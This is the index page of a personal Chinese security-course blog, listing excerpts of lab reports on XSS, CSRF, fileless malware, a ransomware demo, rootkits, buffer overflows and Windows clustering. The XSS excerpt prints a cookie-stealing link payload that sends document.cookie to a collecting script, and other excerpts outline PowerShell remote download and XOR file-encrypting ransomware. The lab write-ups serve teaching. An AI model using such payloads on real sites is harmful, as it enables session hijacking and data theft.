avatar
文章
33
标签
26
分类
5
首页
分类
归档
文章
关于
Moyuan"s website
首页
分类
归档
文章
关于

Moyuan"s website

Web安全技术与应用期末复习
发表于2025-01-05|Web安全
Web安全技术与应用期末复习资料题型分布 填空题:(2*10) 判断题:(2*10) 问答题:(60) 4/5 复习建议 熟记相关定义的英文缩写及中文名称,确保对各类概念有清晰理解。 第一篇 预备知识项目1 Web 服务器平台安装与配置 原理:搭建一个基本的 Web 服务器平台,包括操作系统 (Windows Server 2008)、Web 服务器 (Apache)、数据库 (MySQL) 和服务器端编程语言 (PHP)。 概念:Web 服务器平台、操作系统、Web 服务器软件、数据库、服务器端编程语言、Web 开发基础 (HTML、CSS、JavaScript、PHP)。 常见服务器操作系统 Windows Server Linux/Unix 主要Web服务器及市场占有率 Apache:47.0% Nginx:37.7% Microsoft IIS:10.0% Apache优势 开源、免费 强大的社区支持 关系型数据库管理系统(RDBMS) Oracle, Microsoft SQL Server, IBM DB2, MySQL, PostgreSQL ...
实验报告:基于勒索病毒、机器学习和深度学习的恶意程序检测研究
发表于2024-12-13|系统安全
实验报告:基于勒索病毒、机器学习和深度学习的恶意程序检测研究实验背景随着信息技术的迅猛发展,计算机病毒的种类和数量不断增加,给信息安全带来了严峻挑战。传统的病毒检测方法主要依赖特征码和启发式分析,但在应对新型和变种病毒时效果有限。机器学习和深度学习作为现代人工智能的重要分支,提供了新的解决方案。恶意程序是网络安全的重要威胁,其中勒索病毒尤为严重,通过加密受害者文件索取赎金。本实验分三个部分: 设计一个简单的勒索病毒Demo,了解恶意程序的基本行为。 利用机器学习方法检测恶意程序。 利用深度学习方法检测并分类恶意程序。 第一部分:勒索病毒Demo设计实验目的利用ChatGPT实现一个勒索病毒的简化模型,模拟文件加密与解密流程,探究恶意程序的行为特征。 技术实现 加密功能: 遍历当前目录及子目录中的所有文件。 使用简单的异或加密算法(XOR)加密文件内容,并将加密后的文件扩展名改为.exe。 删除原始文件,保留加密后的文件。 解密功能: 遍历加密文件,使用相同的XOR解密逻辑还原原始文件。 删除加密文件,恢复文件原始状态。 代码逻辑 文件遍历:使用Windows API...
CSRF攻击与防护
发表于2024-12-04|Web安全
CSRF攻击与防护1. 背景与原理1.1 CSRF攻击定义 CSRF(Cross Site Request Forgery,跨站请求伪造)是一种利用用户身份权限的攻击方式。 攻击者诱导已登录目标网站的用户访问含有恶意代码的页面,伪造用户的合法请求,执行未授权操作。 1.2 CSRF攻击的原理 浏览器的同源策略允许同源的网页共享Cookie,但攻击者可以利用此策略: 用户登录目标网站后,浏览器保存Cookie。 用户访问恶意页面时,页面中的恶意代码通过伪造请求,利用用户Cookie向目标网站发送恶意请求。 1.3 CSRF攻击的危害 在用户毫不知情的情况下: 窃取用户信息。 未经授权的资金转移。 操作敏感的账户功能。 2. 项目任务概述实验通过创建两个网站(目标网站和攻击网站),模拟CSRF攻击并探讨防护措施。具体任务如下: 建立一个具有用户添加功能的目标网站(存在CSRF漏洞)。 创建一个模拟CSRF攻击的网站。 测试目标网站是否可以被CSRF攻击。 通过HTTP Referer验证和操作确认对话框两种方式防护CSRF攻击。 3. 实验过程3.1 任务1:建...
XSS跨站攻击与Cookie验证欺骗实验
发表于2024-12-03|Web安全
XSS跨站攻击与Cookie验证欺骗实验一、实验目的 研究并实践XSS攻击的原理与实现方式。 实现通过XSS攻击获取网页地址、User-Agent及Cookie的方法。 提交实验代码与报告,验证攻击与防护效果。 二、XSS跨站攻击实现细节1. 基本原理XSS是一种通过注入恶意代码在用户浏览器中执行非授权操作的攻击方式。主要分为: 持久型XSS:恶意代码存储在服务器,能长期触发。 非持久型XSS:恶意代码不存储,依赖特定URL。 2. 利用XSS攻击Cookie验证通过XSS脚本,将目标用户的Cookie发送至攻击者控制的服务器,绕过正常验证实现欺骗。 代码示例:在留言表单中插入: 1<a href="#" onclick="document.location='http://localhost/getsession/savesession.php?cookie='+escape(document.cookie);">Click Me</a> 当管理员点击链接时,document.cook...
无文件病毒的定义及实践
发表于2024-12-03|系统安全
无文件病毒的定义及实践 实验目的 理解无文件病毒的定义及其主要类型。 学习并实践利用NTFS数据流文件创建ADS数据流文件。 使用PowerShell实现远程下载与隐匿执行脚本。 实验环境 操作系统:Windows 10 (支持NTFS文件系统) 工具: 命令提示符 (cmd) PowerShell 记事本 (Notepad) WinHex(用于查看和删除ADS数据流文件) 网络服务器 (用于托管远程脚本) 实验内容1. 无文件病毒的定义及类型无文件病毒定义无文件病毒是指不依赖传统文件形式的恶意代码。它利用内存、注册表、合法系统工具(如PowerShell、CMD、NTFS ADS等)执行其功能,从而规避文件扫描型安全软件。 主要类型: 灰色工具型:使用合法系统工具或组件如PowerShell、注册表、NTFS ADS。 脚本型:使用脚本语言(如VBScript、JavaScript)进行隐匿攻击。 潜伏型:将恶意代码隐匿在注册表、WMI或系统库文件中以长期驻留。 内存型:病毒仅存在于内存中,无磁盘落地,执行后即从内存中移除。 2. NTFS ADS数据流文件创...
故障转移群集搭建与群集系统安装
发表于2024-12-03|Windows服务器
故障转移群集搭建与群集系统安装一、实验目的 搭建故障转移群集:实现服务和应用程序的高可用性。 群集系统安装环境设置:掌握搭建环境的配置要求。 二、实验环境 操作环境: Windows Server 2019 SQL Server 2019 实验工具: VMware 三、实验原理故障转移群集故障转移群集通过在多台服务器上部署相同的服务和应用程序,利用监控与自动切换机制,实现单点故障时的服务迁移,提高系统的可用性和容错能力。 群集系统安装环境设置确保以下要求: 服务器之间的网络连接正常。 操作系统兼容并满足群集系统要求。 硬件配置满足最低要求。 主机名和 IP 地址配置正确。 四、实验步骤与分析(调整后)(一)前期准备1. 检查IP配置 节点 Public IP Private IP 群集IP 域名 群集名 Server1 192.168.80.27 10.1.1.2 192.168.80.16 nodeA moyu Server2 192.168.80.32 10.1.1.3 192.168.80.16 nodeB moyu M...
Microsoft 群集服务(MSCS)环境的搭建
发表于2024-11-21|Windows服务器
Microsoft 群集服务(MSCS)环境的搭建实验目的 利用 Windows Server 构建群集环境,具体包括: 创建三个虚拟机环境 部署群集环境 配置共享磁盘系统 实验环境 操作系统: Windows Server 2019 工具: FreeNAS 网络配置: Node A: Public IP:192.168.80.10 Private IP:10.1.1.2 群集 IP:192.168.80.15 Node B: Public IP:192.168.80.11 Private IP:10.1.1.3 群集 IP:192.168.80.15 Windows 2019: Public IP:192.168.80.6 NAS: Public IP:192.168.80.8 注意: Windows Server 2019 需创建三个独立的虚拟机,避免使用克隆方式,以防止域的 SID 冲突导致无法完成域加入。 修改 SID 的方法在避免克隆 SID 冲突的情况下,推荐使用内置的 Sysprep 工具来生成新的...
Windows Server 群集环境下的部署操作
发表于2024-11-21|Windows服务器
Windows Server 群集环境下的部署操作实验目的 学习在 Windows Server 群集环境下的部署操作。 掌握共享磁盘的设计与应用。 实验环境 操作系统:Windows Server 2019 实验工具:FreeNAS 实验过程与分析一、虚拟机安装与配置 安装与克隆: 下载 Windows Server 2019 的镜像文件。 安装并配置一台主机 (Master) 后,克隆两个相同的虚拟机节点。 克隆方式为选择“克隆全部内容”。 配置网络适配器: NodeA和NodeB的网卡适配器设置如下: 适配器 1:设为“仅主机模式”。 适配器 2:设为“NAT”模式。 二、群集环境部署 账户配置: 同时启动 NodeA 和 NodeB。 进入 NodeA 的控制面板,调整账户名称为“nodeA”,NodeB 做相应设置。 防火墙关闭: 在每个节点上关闭防火墙。 网络配置: 进入网络和共享中心,调整网络适配器: 内网网卡设置为“Private”。 外网网卡设置为“Public”(最好用已连接网络的设置为pu...
计算机系统分层设计与Rootkit概念及实现
发表于2024-11-21|系统安全
💻 计算机系统分层设计 与 🐛Rootkit 概念及实现🧪 实验问题 1简述 💻 计算机系统 中的分层设计理念及相关应用举例🎯 实验目的 理解 💻 计算机系统 分层设计理念及其重要性。 学习 分层设计 在 💻 计算机系统 中的典型应用。 📝 实验内容分层设计 是一种将复杂系统划分为若干层次的设计方法,每层专注于特定的功能或抽象级别,向上提供服务,向下请求服务。这种设计理念使得系统模块化、易于维护和扩展。 分层设计的特点: 模块化:每一层可以独立开发和测试。 易于扩展:新增功能仅需在相应层中进行。 维护性强:局部修改不会影响其他层。 典型应用: 操作系统: 🖥️ 操作系统 采用分层设计,从硬件到用户程序通常分为硬件层、内核层、系统调用接口层、用户层等。 实例:📂 文件系统 位于内核层,它抽象出文件管理功能,向上层屏蔽了硬件存储设备的细节。 网络协议栈: 🌐 OSI 七层模型 是网络通信领域的分层设计典范,将通信过程划分为物理层、数据链路层、网络层、传输层、会话层、表示层和应用层。 实例:📨 HTTP 位于应用层,它依赖于传输层(如 📦 TC...
实验报告:缓冲区溢出攻击的实现过程
发表于2024-11-21|系统安全
实验报告:缓冲区溢出攻击的实现过程本实验旨在演示缓冲区溢出(Buffer Overflow)攻击的基本过程,包括构造漏洞程序、寻找跳板地址、构造并注入Shellcode来实现控制流劫持。 1. 实验目标缓冲区溢出(Buffer Overflow)是指程序在写入数据到内存缓冲区时,超出了预分配的空间,从而覆盖相邻的内存数据。此漏洞主要出现在不安全的函数(如 strcpy 等)中,允许攻击者在内存中任意写入数据。通过控制写入数据的内容,攻击者可覆盖程序的返回地址、函数指针等关键变量,进而实现恶意代码的执行。 栈溢出:溢出缓冲区位于栈上,覆盖返回地址,改变控制流。 堆溢出:溢出缓冲区位于堆上,通常通过修改函数指针或内存管理数据结构来实现。 通过缓冲区溢出漏洞,修改程序返回地址,实现自定义代码的执行。同时,演示如何在 Windows 和 Linux 环境下利用缓冲区溢出,最终实现计算机病毒的传播。 实验环境 操作系统:Ubuntu 22.04 / Windows 10 编译器:gcc (Linux)、Dev C++ (Windows) 调试工具:GDB (Linux)、x32dbg...
12…4
avatar
moyuan
prograing or coffee
文章
33
标签
26
分类
5
Follow Me
公告
This is my Blog
最新文章
Web安全技术与应用期末复习2025-01-05
实验报告:基于勒索病毒、机器学习和深度学习的恶意程序检测研究2024-12-13
CSRF攻击与防护2024-12-04
XSS跨站攻击与Cookie验证欺骗实验2024-12-03
无文件病毒的定义及实践2024-12-03
分类
  • CTF1
  • Web安全3
  • Windows服务器3
  • 密码学22
  • 系统安全4
标签
MSCS 溢出 群集 密码学 LFSR Windows服务器 XSS 系统安全 Web安全 缓冲区溢出 流密码 病毒 恶意程序 DSS 分组密码 椭圆曲线 RSA AES Rootkit Hash 机器学习 ElGamal 数字签名 复习 公钥加密 CSRF
归档
  • 一月 2025 1
  • 十二月 2024 5
  • 十一月 2024 4
  • 七月 2024 22
  • 二月 2024 1
网站信息
文章数目 :
33
本站访客数 :
本站总浏览量 :
最后更新时间 :
© 2025 - 2026 By moyuan框架 Hexo 6.3.0|主题 Butterfly 5.5.4